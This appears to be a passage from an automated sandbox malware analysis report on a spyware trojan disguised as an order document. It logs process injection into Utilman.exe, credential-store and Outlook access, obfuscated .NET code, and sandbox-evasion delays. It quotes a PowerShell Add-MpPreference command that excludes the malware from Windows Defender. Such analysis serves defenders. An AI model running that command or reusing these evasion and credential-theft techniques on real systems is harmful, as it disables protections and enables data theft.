                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_051235C0 NtCreateMutant,LdrInitializeThunk,7_2_051235C0
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_051239B0 NtGetContextThread,LdrInitializeThunk,7_2_051239B0
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_05122D00 NtSetInformationFile,7_2_05122D00
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_05122DB0 NtEnumerateKey,7_2_05122DB0
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_05122C00 NtQueryInformationProcess,7_2_05122C00
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_05122CC0 NtQueryVirtualMemory,7_2_05122CC0
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_05122CF0 NtOpenProcess,7_2_05122CF0
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_05122F60 NtCreateProcessEx,7_2_05122F60
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_05122F90 NtProtectVirtualMemory,7_2_05122F90
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_05122FA0 NtQuerySection,7_2_05122FA0
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_05122E30 NtWriteVirtualMemory,7_2_05122E30
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_05122EA0 NtAdjustPrivilegesToken,7_2_05122EA0
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_05122B80 NtQueryInformationFile,7_2_05122B80
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_05122AB0 NtWaitForSingleObject,7_2_05122AB0
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_05123010 NtOpenDirectoryObject,7_2_05123010
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_05123090 NtSetValueKey,7_2_05123090
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_05123D10 NtOpenProcessToken,7_2_05123D10
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_05123D70 NtOpenThread,7_2_05123D70
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_032293E0 NtCreateFile,7_2_032293E0
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_03229640 NtDeleteFile,7_2_03229640
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_032296E0 NtClose,7_2_032296E0
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_03229550 NtReadFile,7_2_03229550
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_03229840 NtAllocateVirtualMemory,7_2_03229840
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_0540FB5E NtSetContextThread,7_2_0540FB5E
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_0540FA63 NtSetContextThread,NtResumeThread,7_2_0540FA63
                      Source: ORDER REF 47896798 PSMCO.exe, 00000000.00000002.2114968626.00000000012FE000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs ORDER REF 47896798 PSMCO.exe
                      Source: ORDER REF 47896798 PSMCO.exe, 00000000.00000000.2091621155.0000000000C32000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenamexdNq.exe< vs ORDER REF 47896798 PSMCO.exe
                      Source: ORDER REF 47896798 PSMCO.exe, 00000000.00000002.2127685427.0000000007520000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameMontero.dll8 vs ORDER REF 47896798 PSMCO.exe
                      Source: ORDER REF 47896798 PSMCO.exe, 00000000.00000002.2127145290.0000000005A90000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameCaptive.dll" vs ORDER REF 47896798 PSMCO.exe
                      Source: ORDER REF 47896798 PSMCO.exe, 00000000.00000002.2123760406.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameCaptive.dll" vs ORDER REF 47896798 PSMCO.exe
                      Source: ORDER REF 47896798 PSMCO.exe, 00000000.00000002.2123760406.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameMontero.dll8 vs ORDER REF 47896798 PSMCO.exe
                      Source: ORDER REF 47896798 PSMCO.exe, 00000005.00000002.2290830166.0000000001477000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameutilman2.exej% vs ORDER REF 47896798 PSMCO.exe
                      Source: ORDER REF 47896798 PSMCO.exe, 00000005.00000002.2291248989.00000000019FD000.00000040.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs ORDER REF 47896798 PSMCO.exe
                      Source: ORDER REF 47896798 PSMCO.exe, Binary or memory string: OriginalFilenamexdNq.exe< vs ORDER REF 47896798 PSMCO.exe
                      Source: ORDER REF 47896798 PSMCO.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: ORDER REF 47896798 PSMCO.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, WVyNmFfWHFtrghUQ4t.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, iaviUev9xV9vXfKHtd.cs, Security API names: _0020.SetAccessControl
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, iaviUev9xV9vXfKHtd.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, iaviUev9xV9vXfKHtd.cs, Security API names: _0020.AddAccessRule
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, WVyNmFfWHFtrghUQ4t.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, iaviUev9xV9vXfKHtd.cs, Security API names: _0020.SetAccessControl
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, iaviUev9xV9vXfKHtd.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, iaviUev9xV9vXfKHtd.csSecurity API names: _0020.AddAccessRule
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/7@17/10
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER REF 47896798 PSMCO.exe.logJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4788:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dg0wlaew.2sd.ps1Jump to behavior
                      Source: ORDER REF 47896798 PSMCO.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: Utilman.exe, 00000007.00000002.4553324298.00000000033AC000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000007.00000002.4553324298.00000000033DB000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000007.00000002.4553324298.00000000033B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: ORDER REF 47896798 PSMCO.exe | Virustotal: Detection: 48%
                      Source: ORDER REF 47896798 PSMCO.exe | ReversingLabs: Detection: 52%
                      Source: unknown | Process created: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe"
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe | Process created: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe"
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe | Process created: C:\Windows\SysWOW64\Utilman.exe "C:\Windows\SysWOW64\Utilman.exe"
                      Source: C:\Windows\SysWOW64\Utilman.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe | Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windowscodecs.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, dwrite.dll, textshaping.dll, iconcodecservice.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, amsi.dll, userenv.dll, profapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll
                      Source: C:\Windows\SysWOW64\Utilman.exe | Section loaded: oleacc.dll, duser.dll, dui70.dll, wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe | Section loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\SysWOW64\Utilman.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                      Source: ORDER REF 47896798 PSMCO.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: ORDER REF 47896798 PSMCO.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: Utilman.pdb source: ORDER REF 47896798 PSMCO.exe, 00000005.00000002.2290830166.0000000001477000.00000004.00000020.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000006.00000002.4557268492.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000006.00000003.2228849768.000000000099B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oDhSPGbJgMIIvl.exe, 00000006.00000000.2215812419.0000000000B4E000.00000002.00000001.01000000.0000000C.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4557525430.0000000000B4E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: ORDER REF 47896798 PSMCO.exe, 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000007.00000003.2299005386.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000007.00000003.2291191477.0000000004D5B000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: ORDER REF 47896798 PSMCO.exe, ORDER REF 47896798 PSMCO.exe, 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, Utilman.exe, 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000007.00000003.2299005386.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000007.00000003.2291191477.0000000004D5B000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: Utilman.pdbGCTL source: ORDER REF 47896798 PSMCO.exe, 00000005.00000002.2290830166.0000000001477000.00000004.00000020.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000006.00000002.4557268492.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000006.00000003.2228849768.000000000099B000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.5a90000.2.raw.unpack, DlRvq5yJkomY4LIf3S.cs | .Net Code: X2WPMWey8AqqJOPa61l(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{X2WPMWey8AqqJOPa61l(typeof(IntPtr).TypeHandle),typeof(Type)})
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, iaviUev9xV9vXfKHtd.cs | .Net Code: yeEpGrFP3n System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, iaviUev9xV9vXfKHtd.cs | .Net Code: yeEpGrFP3n System.Reflection.Assembly.Load(byte[])
                      Source: ORDER REF 47896798 PSMCO.exe | Static PE information: section name: .text entropy: 7.753164497880348
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, NOIBYUnYgtFK7pKYCu.csHigh entropy of concatenated method names: 'DlSwrG82mh', 'PGAwJN76hT', 'IiAwfgVjwL', 'LGswn77n1f', 'k7EwTrdk8K', 'kmyw4pK3bS', 'H8EwKsrbBe', 'hHDw55x81s', 'ImAwSxGRX8', 'py4wxbLn4k'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, Xog1FY1fUcZdwyj6YO.csHigh entropy of concatenated method names: 'XWx7fayOa7', 'Pay7nD5gMR', 'W6j7gpNYXM', 'jVC7BDRf3w', 'SRC7Nlad6x', 'QvF7Xmn80k', 'WOq79XFInV', 'vYr7MOroQc', 'zbv7Dh8K5w', 'vs47cwyYdS'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, aY8cTYZ0LsTcFCmbjlt.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NCAxcZu7g4', 'ImkxE34QFP', 'Hufx1RmOiB', 'iTsxdhmdJa', 'PrGxolAEgF', 'NQjxFCQgSo', 'vAOxtiTPa7'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, iaviUev9xV9vXfKHtd.csHigh entropy of concatenated method names: 'Tu9iqtufF4', 'D5jiULnTwj', 'dhsi2F3HLE', 'c2GiwA27J2', 'crFiWxXEO2', 'zxeiQfZ6p9', 'MW2i8yr1vx', 'B66ivdkhwx', 'qN5iVIBDui', 'KbUiyrLTB6'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, GIZLM2hyoSkFDi6LHb.csHigh entropy of concatenated method names: 'exKSgDcikf', 'iCASBSTQoQ', 'xhDSkntoPr', 'SGrSNaJSoH', 'PKfSXpMurj', 'wbpSHj4HTh', 'QC6S9mQxEC', 'U1vSMvpT61', 'OseSeJkO1H', 'STpSDfufKa'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, qRFt1xpUZB7uIhqJrD.csHigh entropy of concatenated method names: 'cYRZ8VyNmF', 'iHFZvtrghU', 'fYgZytFK7p', 'qYCZIuJwAj', 'mEvZTKLP5E', 'hXyZ4cZW63', 'Tmor1V1Zp22eLdwl0h', 'KqQAmhAyio2OhbbY92', 'jODZZhIcEN', 'XeHZiRh6X0'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, WVyNmFfWHFtrghUQ4t.csHigh entropy of concatenated method names: 'j7e2dBD1sM', 'k302ogQN6i', 'sRU2FlIWl1', 'Ux72tb4D4n', 'oDH2YlVclg', 'Sse2jQkhFo', 'ps22R9yGan', 'Vq92PRyQmx', 'Kyg2hIsYyD', 'WTh2A5eeh3'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, wdeyBdenPbCNp1NoWJ.csHigh entropy of concatenated method names: 'SYi8lZTiZt', 'yQ18Li9Rin', 'dUv8GyRDR4', 'bGL8rvD8Fg', 'LIv8b06ZF5', 'Kh28JColTw', 'q8h8sarNtj', 'ei78fBpuha', 'pcO8n9iauE', 'lZB8666uBS'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, EiGHJW2wRU8D1VUSab.csHigh entropy of concatenated method names: 'Dispose', 'XhhZh7lboQ', 'PtvOB5Dy0P', 'MDXNegGhOW', 'IOuZAZksj7', 'XH4ZzunELq', 'ProcessDialogKey', 'rPgO0IZLM2', 'loSOZkFDi6', 'yHbOOLGJdN'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, yGJdNEAjgLRfgWF8nJ.csHigh entropy of concatenated method names: 'j8BxwE4Ktb', 'VXmxWKCR1B', 'j7ExQZo8E5', 'Lxcx8h0XKK', 'vdDxSOmBEq', 'mvoxvHtLy3', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, QHaysSwyBxpRO63SLU.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'twxOheJAKB', 'CEYOAMFAiy', 'sMBOzCdkJe', 't4Ti0eLvHa', 'SCQiZTB6er', 'jGLiO8QPtN', 'ayriiOphvn', 'zAibmk5VMbZXypkfIB7'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, tnltDQtmY55ymiPeuF.csHigh entropy of concatenated method names: 'WvoKy7MPsb', 'vTQKIPRI8v', 'ToString', 'tjaKUJ4OLW', 'Jp4K2OmLP7', 'iLyKwc6Tci', 'n3nKWt4rfb', 'xeoKQQCh9N', 'wHEK8BQD93', 'M3GKvodZC3'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, f2RrapOuUxWZMZ3oNB.csHigh entropy of concatenated method names: 'VgNGfa0Tm', 'n1ErPEHLQ', 'RKXJwn5XM', 'HFIsl5YH7', 'S7bn5KA06', 'oYE67mQ41', 'YAVKiPomD29PXfkd0v', 'kslG0phbKXMnpNFLjx', 'G0r5tOx5A', 'nPjxKfv6h'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, tqcls1BsFIoWP2B70p.csHigh entropy of concatenated method names: 'vTVduQpwANt1ndk9Fyd', 'DUXKbMpxexHZMc2Cy1W', 'eoAQ5vyrf1', 'YZOQSSmDsP', 'N6CQx2ZM4I', 'PaPECwpJkLEYj9aKbRw', 'rC1xKGpqwdcFIuw0h2c'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, W5EwXygcZW63gCVw6T.csHigh entropy of concatenated method names: 'QhoQqGVNIY', 'BelQ2HiAVV', 'bh7QWWs4c5', 'LG6Q89tjXK', 'pr7QvtCk78', 'nLXWYyDDDm', 'nHcWjsNSmV', 'vUBWR76nkv', 'NOsWPI6yRv', 'fcHWhXdhle'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, W4Rke9jS3n4Dqfmcae.csHigh entropy of concatenated method names: 'FYxKPjVXLU', 'GVmKASFRJQ', 'YvO50L5l8P', 'HTK5ZQ0mUG', 'nl4KcvkUiG', 'HbmKEd0ml3', 'O5TK1Ox9fZ', 'oDJKdC1NNx', 'oqiKopwOj8', 'mVcKFridMA'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, URdXGgRYmhhh7lboQk.csHigh entropy of concatenated method names: 'wWKSTpjLII', 'BFxSKpb6N6', 'TgNSSfVTXg', 'mKkSCaxc20', 'GkNSmmuFiN', 'EM4Suin66t', 'Dispose', 'Wtx5U5RsXA', 'Y0752dllit', 'mNd5wySREI'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, iT8vdP9ynmNm67blAv.csHigh entropy of concatenated method names: 'Htt8UYaBsT', 'FuM8wCrkwA', 'Rsf8QolO6V', 'unOQArt8yp', 'gc5QzVgmsb', 'CL680t303N', 'mQE8ZoKPVf', 'xHc8OBHSPb', 'J0L8iDANbm', 'xLk8pZLLiH'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, CwAjHg6KAaffPIEvKL.csHigh entropy of concatenated method names: 'mLmWbkgEHG', 'xPxWs4JTuK', 'dw1wk2sJeu', 'U6twNJHi4J', 'gOZwXNK0Ip', 'eRRwH4iVeV', 'fC6w9K0by9', 'kCHwMs2CKv', 'hAawew1GGv', 'aakwDIio51'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, HgOmuNZZj0vObDopIP3.csHigh entropy of concatenated method names: 'RhNxA4hxwS', 'lodxz8ZwFv', 'BJeC0hi836', 'gaXCZaujG1', 'AHPCOdB6L9', 'u20CiO5t7n', 'TmxCpNhL2P', 'SCRCqCUwkZ', 'PfTCU5jvaM', 'KqaC2wnudi'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, axW4hOdVgLfr4v5736.csHigh entropy of concatenated method names: 'fHMTDdg4nt', 'uWtTE5dyvV', 'PRXTdDWivr', 'Lr2TofrApe', 'VmeTB0Vweh', 'coaTklDu7u', 'Bp7TNJlM1F', 'GwkTXxVei8', 'xRrTHNnl91', 'pJaT9udwI0'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, Gr7yhszNpUuDBdrE9I.csHigh entropy of concatenated method names: 'kJKxJUqeIX', 'bD2xf3Mt6U', 'IWXxnausBv', 'q6LxgTs7Ji', 'lZlxBijF7q', 'QobxNd1koK', 'gagxXEgld5', 'fLCxu4sdxi', 'IU6xl0Fhek', 'RAkxL5uUbd'

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\Utilman.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match File source: Process Memory Space: ORDER REF 47896798 PSMCO.exe PID: 3568, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\Utilman.exe API/Special instruction interceptor: Address: 7FFDB442D324
                      Source: C:\Windows\SysWOW64\Utilman.exe API/Special instruction interceptor: Address: 7FFDB442D7E4
                      Source: C:\Windows\SysWOW64\Utilman.exe API/Special instruction interceptor: Address: 7FFDB442D944
                      Source: C:\Windows\SysWOW64\Utilman.exe API/Special instruction interceptor: Address: 7FFDB442D504
                      Source: C:\Windows\SysWOW64\Utilman.exe API/Special instruction interceptor: Address: 7FFDB442D544
                      Source: C:\Windows\SysWOW64\Utilman.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
                      Source: C:\Windows\SysWOW64\Utilman.exe API/Special instruction interceptor: Address: 7FFDB4430154
                      Source: C:\Windows\SysWOW64\Utilman.exe API/Special instruction interceptor: Address: 7FFDB442DA44
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe Memory allocated: 1660000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe Memory allocated: 30F0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe Memory allocated: 9220000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe Memory allocated: A220000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe Memory allocated: A420000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe Memory allocated: B420000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe Code function: 5_2_0194096E rdtsc 5_2_0194096E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3917
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 924
                      Source: C:\Windows\SysWOW64\Utilman.exe Window / User API: threadDelayed 9838
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe API coverage: 0.7 %
                      Source: C:\Windows\SysWOW64\Utilman.exe API coverage: 2.6 %
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe TID: 3492 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6944 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 424 Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\SysWOW64\Utilman.exe TID: 6244 Thread sleep count: 135 > 30
                      Source: C:\Windows\SysWOW64\Utilman.exe TID: 6244 Thread sleep time: -270000s >= -30000s
                      Source: C:\Windows\SysWOW64\Utilman.exe TID: 6244 Thread sleep count: 9838 > 30
                      Source: C:\Windows\SysWOW64\Utilman.exe TID: 6244 Thread sleep time: -19676000s >= -30000s
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe TID: 988 Thread sleep time: -95000s >= -30000s
